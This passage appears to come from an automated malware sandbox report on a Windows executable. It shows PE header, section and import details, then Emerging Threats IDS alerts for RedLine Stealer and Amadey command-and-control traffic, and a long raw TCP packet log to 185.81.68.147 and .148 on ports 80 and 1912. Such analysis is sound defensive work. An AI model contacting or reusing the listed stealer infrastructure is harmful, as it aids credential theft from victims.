                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                • [C++] VS2010 build 30319
                                                                                                                                                                                                • [RES] VS2010 build 30319
                                                                                                                                                                                                • [LNK] VS2010 build 30319
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x68400x28.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x328.rsrc
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x80000x240.pdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x50000x20.rdata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                .text0x10000x39cb0x3a00a8859d1f9b0c91e6fb1eb31e0fba6d60False0.4165544181034483zlib compressed data5.545864849703848IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rdata0x50000x18c80x1a0054f0fa7b25bcbaa76c26039919fc716bFalse0.29041466346153844OpenPGP Public Key4.185103722160237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .data0x70000x6880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                .pdata0x80000x2400x400c0d1e6294ad4138cca9188a27b6b84e5False0.345703125data2.5822176110941975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .rsrc0x90000x3280x4000d7214eb073287b0cc1ef48e92bf4fcbFalse0.361328125data2.6200573070054105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                .x640xa0000x460000x454006734efcbf5cef0f9c7a4db8068e0ffc5False0.4619986744133574data6.098536918995324IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                RT_VERSION0x90600x2c4dataEnglishUnited States0.4717514124293785
                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                KERNEL32.dllLoadLibraryA, GetVersionExW, GetProcAddress
                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                EnglishUnited States
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2024-12-13T08:18:49.337834+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1149726185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:19:00.225322+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1149748185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:19:04.468315+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:04.468315+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:04.901403+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.1149760TCP
                                                                                                                                                                                                2024-12-13T08:19:05.196213+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1149761185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:19:10.204185+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:11.513947+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:11.633705+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.1149760TCP
                                                                                                                                                                                                2024-12-13T08:19:11.961998+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:12.400353+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:12.859879+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:13.736992+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:14.356841+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:14.476950+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:16.091899+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:16.536536+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:16.972311+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:17.407692+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:17.846333+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:18.287580+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:18.801374+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:19.998470+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:20.489301+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:21.072324+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:21.938659+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:22.382676+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:22.819111+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:23.252378+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:19:23.725939+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.1149760185.81.68.1471912TCP
                                                                                                                                                                                                2024-12-13T08:20:07.277034+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1149938185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:20:07.300584+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.1149939185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:20:10.326543+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1149946185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:13.878638+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1149958185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:20:16.971319+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1149970185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:17.125958+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.1149972185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:20:17.363862+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.1149973185.81.68.14780TCP
                                                                                                                                                                                                2024-12-13T08:20:18.474964+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.1149978185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:18.503049+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.1149977185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:18.626119+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.1149982185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:18.626119+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.1149982185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:18.870922+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.1149983185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:18.870922+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.1149983185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:23.121550+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1149998185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:29.362119+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150017185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:35.799427+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150036185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:42.159878+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150056185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:48.363593+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150073185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:20:54.595635+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150080185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:01.237510+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150088185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:07.535897+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150095185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:13.721615+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150103185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:20.018768+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150110185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:26.706061+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150118185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:33.179320+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150126185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:39.383695+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150134185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:46.208977+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150142185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:52.613527+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150149185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:21:59.065368+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150156185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:05.267999+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150165185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:11.721973+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150171185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:18.158976+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150179185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:24.361889+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150186185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:30.646659+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150194185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:37.002261+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150201185.81.68.14880TCP
                                                                                                                                                                                                2024-12-13T08:22:43.300199+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.1150209185.81.68.14880TCP
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Dec 13, 2024 08:18:43.225608110 CET4971380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:43.345391989 CET8049713185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:43.347393990 CET4971380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:43.347393990 CET4971380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:43.467206001 CET8049713185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:44.675121069 CET8049713185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:44.675293922 CET8049713185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:44.675352097 CET4971380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:44.684146881 CET4971380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:44.689562082 CET4971480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:44.804656029 CET8049713185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:44.810049057 CET8049714185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:44.810146093 CET4971480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:44.817557096 CET4971480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:44.937717915 CET8049714185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:44.937910080 CET4971480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:45.057743073 CET8049714185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:46.251863956 CET8049714185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:46.252233028 CET8049714185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:46.252290010 CET4971480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:46.253362894 CET4971480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:46.253716946 CET4972080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:46.373095989 CET8049714185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:46.373457909 CET8049720185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:46.373544931 CET4972080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:46.373603106 CET4972080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:46.493329048 CET8049720185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:46.493392944 CET4972080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:46.613158941 CET8049720185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:47.866478920 CET8049720185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:47.866543055 CET8049720185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:47.866647959 CET4972080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:47.872857094 CET4972080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:47.878690958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:47.992726088 CET8049720185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:47.998526096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:47.998639107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:48.001410007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:48.121285915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337707996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337728977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337750912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337763071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337775946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337788105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337800980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337833881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.337835073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338030100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338061094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338073969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338102102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.338134050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.458576918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.458594084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.458796978 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.463361025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.511859894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.530805111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.530821085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.531012058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.534931898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.534945011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.535090923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.542187929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.545272112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.545314074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.545337915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.553653002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.553718090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.553729057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.563380957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.563395023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.563530922 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.570395947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.570543051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.570545912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.578794003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.578844070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.578887939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.587378979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.587393045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.587584019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.595598936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.595683098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.595752954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.603965998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.604048967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.604191065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.631663084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.631747961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.631938934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.651370049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.699409962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.721797943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.721950054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.722166061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.724127054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.724185944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.724307060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.729178905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.730386972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.730504036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.734242916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.734275103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.734452963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.739409924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.739428997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.739553928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.743818998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.743868113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.744025946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.748447895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.748603106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.748740911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.753078938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.753096104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.753249884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.757720947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.757951975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.758079052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.762460947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.762511969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.762644053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.767168999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.767183065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.767311096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.771716118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.771783113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.771933079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.776441097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.776453972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.776572943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.780982018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.781085014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.781203985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.785621881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.785667896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.785789967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.790287018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.790416956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.790549040 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.794883966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.795006990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.795116901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.799545050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.799590111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.799695969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.804259062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.804323912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:49.804439068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:49.808954000 CET8049726185.81.68.147192.168.2.11
